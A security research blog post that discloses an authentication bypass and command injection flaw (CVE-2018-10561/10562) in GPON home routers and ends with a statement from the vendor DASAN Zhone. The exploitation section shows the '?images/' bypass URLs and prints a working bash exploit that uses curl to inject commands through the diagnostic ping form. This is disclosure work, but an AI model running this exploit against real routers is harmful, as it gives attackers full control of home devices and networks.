Critical RCE Vulnerability Found in Over a Million GPON Home Routers
Here at vpnMentor, we are concerned about your security and privacy. Our special team of hackers & researchers roam the internet to find security issues in sensitive products. We found this RCE vulnerability in the majority of GPON home routers. Read more to find out how we exploited this vulnerability and what you can do about it. Share
Two important updates since this report was published:
- Our research team created a patch that can help effected users. Please check it here
- DASAN Zhone Solutions sent us their comment on the report. We attach it "as is" at the end of this page
Overview:
We executed an all-encompassing evaluation of a variety of GPON home routers. It is known that a significant number of today's routers operate using GPON internet, and we have discovered a strategy to override all device authentication protocols (CVE-2018-10561). This bypass of the authentication process further revealed an additional command injection flaw (CVE-2018-10562), giving us the capacity to carry out commands on the given device.
Exploitation:
During our analysis of GPON firmwares, we found two different critical vulnerabilities (CVE-2018-10561 & CVE-2018-10562) that could, when combined allow complete control on the device and therefore the network. The first vulnerability exploits the authentication mechanism of the device that has a flaw. This flaw allows any attacker to bypass all authentication.
The flaw can be found with the HTTP servers, which check for specific paths when authenticating. This allows the attacker to bypass authentication on any endpoint using a simple trick.
By appending ?images/ to the URL, the attacker can bypass the endpoint.
This works on both HTML pages and GponForm/
For instance, by inserting
/menu.html?images/
or
/GponForm/diag_FORM?images/
we can manage the device.
While looking through the device functionalities, we noticed the diagnostic endpoint contained the ping and traceroute commands. It didn’t take much to figure out that the commands can be injected by the host parameter.
Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.
We include the following bash version of the exploit code:
#!/bin/bash
echo "[+] Sending the Command... "
# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'
Impact:
GPON is a type of passive optical network that uses fiber-optics and is particularly popular. When people use GPON, the routers are provided by ISPs. Over one million people use this type of network system router.
We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.
Recommendations:
- Check if your router uses the GPON network.
- Be aware that GPON routers can be hacked and exploited.
- Talk to your ISP to see what they can do to fix the bug.
- Warn your friends on Facebook (click here to share) and Twitter (click here to tweet).
Update: Statement from DZS regarding authentication bypass exploit
DASAN Zhone Solutions, Inc. has investigated recent media reports that certain DZS GPON Network Interface Devices (NIDs), more commonly known as routers, could be vulnerable to an authentication bypass exploit.
DZS has determined that the ZNID-GPON-25xx series and certain H640series GPON ONTs, when operating on specific software releases, are affected by this vulnerability. No service impacts from this vulnerability have been reported to DZS to date. After an internal investigation, we have determined the potential impact is much more limited in scope than reported by vpnMentor. According to DZS sales records, combined with field data gathered to date, we have estimated that the number of GPON ONT units that may be potentially impacted to be less than 240,000. In addition, given the relative maturity of the products in their lifecycle, we think the impact is limited to even fewer devices.
Product History
The DZS ZNID-GPON-25xx and certain H640-series ONTs, including the software that introduced this vulnerability, were developed by an OEM supplier and resold by DZS. Designed and released more than 9 years ago, most of these products are now well past their sustainable service life. Because software support contracts are no longer offered for most of these products, we do not have direct insight to the total number of units that are still actively used in the field.
Resolution
DZS has informed all the customers who purchased these models of the vulnerability. We are working with each customer to help them assess methods to address the issue for units that may still be installed in the field. It will be up to the discretion of each customer to decide how to address the condition for their deployed equipment.
DZS’s mission is to ensure that all its solutions meet the highest security standards in the industry. We embrace this, and every opportunity, to review and continuously improve our security design and testing methodologies.